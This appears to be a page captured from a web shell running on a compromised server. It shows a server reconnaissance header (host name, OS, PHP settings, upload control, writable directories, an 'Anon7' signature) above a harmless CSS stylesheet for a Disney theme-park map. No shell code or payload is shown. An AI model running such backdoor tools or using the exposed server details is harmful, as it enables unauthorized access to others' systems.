KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/gwsolutions/disney/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/gwsolutions/disney/disney.css

* { font-family: Verdana, Arial, Sans Serif; font-size: 14px; }
		
		
body {
	background-color: #ffffff;
	margin: 0 0 0 0;
}
		

		
#map_canvas 
{
	border-bottom: 1px solid #333333;
	width: 100%; 
	height: 100%; 
	position: absolute; 
	top: 0; 
	left: 0; 
	min-height: 860px;
	cursor: pointer;
}
		


.css3gradient {
	width: 15px;
	height: 80px;
	background-color: #3EAA13;
 filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0, startColorstr=#3EAA13, endColorstr=#FBE005);
	background-image: -moz-linear-gradient(top, #3EAA13 0%, #FBE005 50%, #EE363F 100%);
	background-image: linear-gradient(top, #3EAA13 0%, #FBE005 50%, #EE363F 100%);
	background-image: -webkit-linear-gradient(top, #3EAA13 0%, #FBE005 50%, #EE363F 100%);
	background-image: -o-linear-gradient(top, #3EAA13 0%, #FBE005 50%, #EE363F 100%);
	background-image: -ms-linear-gradient(top, #3EAA13 0%, #FBE005 50%, #EE363F 100%);
	background-image: -webkit-gradient(linear, right top, right bottom, color-stop(0%, #3EAA13), color-stop(50%, #FBE005), color-stop(100%, #EE363F));
	opacity: 0.89;
	float: left;
	margin-bottom: 20px;
}
.legendsquarewrapper {
	margin: 0 0 10px 0;
}
.legendsquare {
	width: 15px;
	height: 15px;
	float: left;
}


.frontierland {
	background-color: rgba(255,204,0,0.5);
}
.adventureland {
	background-color: rgba(51,102,255,0.5);
}
.liberty-square {
	background-color: rgba(255,51,119,0.5);
}
.main-street {
	background-color: rgba(0,153,51,0.5);
}
.fantasyland {
	background-color: rgba(178,25,255,0.5);
}
.tomorrowland {
	background-color: rgba(255,85,0,0.5);
}

.legenditems {
	position: relative;
	top: 0px;
	left: 6px;
	font-size: 13px;
}
#legend {
	height: 430px;
	left: 0px;
	position: absolute;
	text-align: left;
	top: 140px;
	width: 160px;
	z-index: 2000;
}
#legendbutton
{
    background-image: url(images/legend-btn.png);
    background-size: contain;
    width: 38px;
    height: 38px;
    top: 0;
    left: 0;
    z-index: 2001;
    position: absolute;
    background-color: white;
    display:none;
}

@media screen and (max-height: 660px) 
{
    #legend
    {
        top: 0px;        
        height: 448px;          /* use 448 because we're showing with legend button */
    }
    #innerlegend
    {
        margin-top: 18px;
    }
    #legendbutton
    {
        display: inline-block;
        background-image: url(images/legend-close-btn.png);
    }
}

@media screen and (max-width: 700px)
{
    #legend
    {
        top: 0px;
        display: none;

    }
    #innerlegend
    {
        margin-top: 18px;
    }
    #legendbutton
    {
        display: inline-block;
        background-image: url(images/legend-btn.png);
    }
}
.bubble {
	background-color: rgba(255,255,255,0.95);
	border: 0px solid #eeffff;
	border-radius: 0px;
	-webkit-box-shadow: 0px 0px 3px 2px rgba(0,0,0,0.10);
	-moz-box-shadow: 0px 0px 3px 2px rgba(0,0,0,0.10);
	box-shadow: 0px 0px 3px 2px rgba(0,0,0,0.10);
	cursor: default;
	font-size: 10px;
	letter-spacing: 0px;
	padding: 20px;
	color: #333333;
}
.legenditem1 {
	height: 12px;
	width: 200px;
	position: relative;
	top: 1px;
	font-size: 13px;
}
.legenditem2 {
	height: 12px;
	width: 200px;
	position: relative;
	top: 20px;
	font-size: 13px;
}

.legenditem3 {
	height: 12px;
	width: 200px;
	position: relative;
	top: 39px;
	font-size: 13px;
}
#map_canvas
{
	width: 100%;
	height: 100%;
	position: absolute;
	top: 0;
	left: 0;
	min-height: 530px;
	cursor: pointer;
    border-bottom: 1px solid #cccccc;
}

@media screen and (max-width: 320px)
{
    #map_canvas {min-height: 480px;}
}

#selectors {
	border-bottom: 1px solid #cccccc;
	background-color:#31434e;
}
.select-style {
	padding: 0;
	margin: 0;
	border: 1px solid #ccc;
	width: 156px;
	border-radius: 3px;
	overflow: hidden;
	background-color: #fff;
	background: #fff url("images/arrowdown.gif") no-repeat 90% 50%;
}
.select-style select {
	padding: 5px 8px;
	width: 130%;
	border: none;
	box-shadow: none;
	background-color: transparent;
	background-image: none;
	-webkit-appearance: none;
	-moz-appearance: none;
	appearance: none;
}
.select-style select:focus {
	outline: none !important;
}
select:-moz-focusring {
    color: transparent;
    text-shadow: 0 0 0 #000;
}

.masthead-container 
{
	background-color: #053b65;
	padding: 15px 15px 15px 15px;
	color: #ffffff;
	height: 48px;
	background-image: url(images/disney-background-01.png);
	background-repeat: no-repeat;
	background-size: contain;
	background-position: right;
}
.masthead-logo {
	width: 200px;
	height: auto;
}
#floating-title 
{
    
    z-index: 2003;
    color: #ffffff;
    /*text-shadow: 2px 2px 2px rgba(150, 150, 150, 1);*/
    position: absolute;
    width: 100%;
    /*left: 50%;*/
    margin-left: 0px;
    padding: 0 0 0 0 !IMPORTANT;
    background-color: rgba(5,59,101,0.6);
}

.masthead-title 
{
    padding-left: 15px;
	font-family: 'Lato', sans-serif;
	font-size: 32px;
	line-height: 48px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
}
.masthead-subtitle 
{
    display: none;
}
@media screen and (max-width: 960px) {
.masthead-title {
	font-family: 'Lato', sans-serif;
	font-size: 27px;
	line-height: 48px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
}
}
@media screen and (max-width: 820px) {
.masthead-container {
	background-color: #053b65;
	padding: 15px;
	color: #ffffff;
	height: 60px;
	background-image: url(images/disney-background-01.png);
	background-repeat: no-repeat;
	background-size: contain;
	background-position: right;
}
.masthead-logo {
	width: auto;
	height: 60px;
}
.masthead-title 
{
    
	font-family: 'Lato', sans-serif;
	font-size: 21px;
	line-height: 60px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
}
}

@media screen and (max-width: 676px) {
.masthead-container {
	background-color: #053b65;
	padding: 15px;
	color: #ffffff;
	height: 40px;
	background-image: url(images/disney-background-01.png);
	background-repeat: no-repeat;
	background-size: contain;
	background-position: right;
}
.masthead-logo {
	width: auto;
	height: 40px;
}
.masthead-title {
	font-family: 'Lato', sans-serif;
	font-size: 20px;
	line-height: 40px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
}
}

@media screen and (max-width: 600px) {
.masthead-title {
	font-family: 'Lato', sans-serif;
	font-size: 20px;
	line-height: 22px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
	/*margin-left:140px;*/
}
}
@media screen and (max-width: 450px) 
{
    
   .masthead-container {
	height: 36px;
	
    }
.masthead-title {
	font-family: 'Lato', sans-serif;
	font-size: 16px;
	line-height: 20px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
	/*margin-left:120px;*/
}
}

@media screen and (max-width: 676px) {
.masthead-title {
	text-align: center;
}
}

@media screen and (max-width: 360px) {
.masthead-title {
	font-family: 'Lato', sans-serif;
	font-size: 13px;
	line-height: 16px;
	font-weight: 700;
	letter-spacing: 1px;
	text-align: center;
	/*margin-left:120px;*/
	padding-top:4px
}
}
@media screen and (max-width: 320px) 
{
    .masthead-container {
	height: 26px;
	
    }
    .masthead-title {
	    font-family: 'Lato', sans-serif;
	    font-size: 13px;
	    line-height: 14px;
	    font-weight: 700;
	    letter-spacing: 1px;
	    text-align: center;
	    max-width: 260px;
	    padding-top:1px
    }
}

#maphook-logo {
	/*position:absolute;*/
	/*z-index: 999;*/
	/*bottom: 30px;
	right: 210px;*/
	background-image: url(images/mh-small-logo.png);
	background-repeat: no-repeat;
	position: absolute;
	margin-left: -5px;
	bottom: 5px;
	width: 82px;
	height: 32px;
}


#gws-logo {
	position:absolute;
	z-index: 999;
	bottom: 30px;
	right: 74px;
	
	background-image: url(images/GWS-Logo.png);
	background-repeat: no-repeat;
	background-size: cover;
}

#gws-logo-alone {
	position:absolute;
	z-index: 999;
	bottom: 30px;
	right: 10px;
	
	background-image: url(images/GWS-Logo.png);
	background-repeat: no-repeat;
	background-size: cover;
}

.gws-size 
{
    width: 100px;
	height: 65px;
}

#forbes-logo 
{
    position:absolute;
	z-index: 999;
	bottom: 30px;
	right: 10px;
	
	background-image: url(images/forbes_square_logo.png);
	background-repeat: no-repeat;
	background-size: cover;
}
.forbes-size 
{
    width: 54px;
	height: 54px;
}



@media screen and (max-width: 375px) 
{
    .forbes-size 
    {
        width: 40px;
	    height: 40px;
    }
    .gws-size 
    {
        width: 74px;
        height: 48px;
    }
    
    #gws-logo {	
	    right: 60px;
    }
}


#twitPad 
{
    position: absolute; 
    top: 36px; 
    left: 80px;
}



@media screen and (max-width: 375px) 
{
      #twitPad 
    {
         top: 40px; 
    }
}
.popbubble {
	border: 0 none;
	margin: 0;
	padding: 8px;
	
}
.pop-table {
	border: 0 none;
	margin: 0;
	padding: 0;
}
.pop-title {
	font-size: 20px;
	font-weight: bold;
	text-align: center;
	color: #444444;
}
.pop-subtitle {
	font-size: 12px;
	font-weight: bold;
	text-align: center;
	color: #444444;
}
.pop-carrier {
	font-size: 12px;
	font-weight: bold;
	color: #444444;
	min-width: 60px;
}
.pop-head {
	font-size: 12px;
	line-height:13px;
	font-weight: normal;
	max-width: 55px;
	text-align: center;
	width: 55px;
	padding:5px 0;
	color: #444444;
}
.pop-ranking {
	font-size: 12px;
	line-height:18px;
	font-weight: bold;
	text-align: center;
	color: #444444;
}
.pop-pad 
{
    height: 20px;
}

.pop-foot 
{
    font-size: 10px;
    font-style: italic;
    text-align: right;
    color: #333333;
}

.infobubble-container {
    -webkit-box-shadow: 0px 0px 8px 0px rgba(0,0,0,0.25);
    -moz-box-shadow: 0px 0px 8px 0px rgba(0,0,0,0.25);
    box-shadow: 0px 0px 8px 0px rgba(0,0,0,0.25);
}


.asterisk 
{
    font-weight: normal;
    font-size: 10px;
    color: #333333;
}

Anon7 - 2021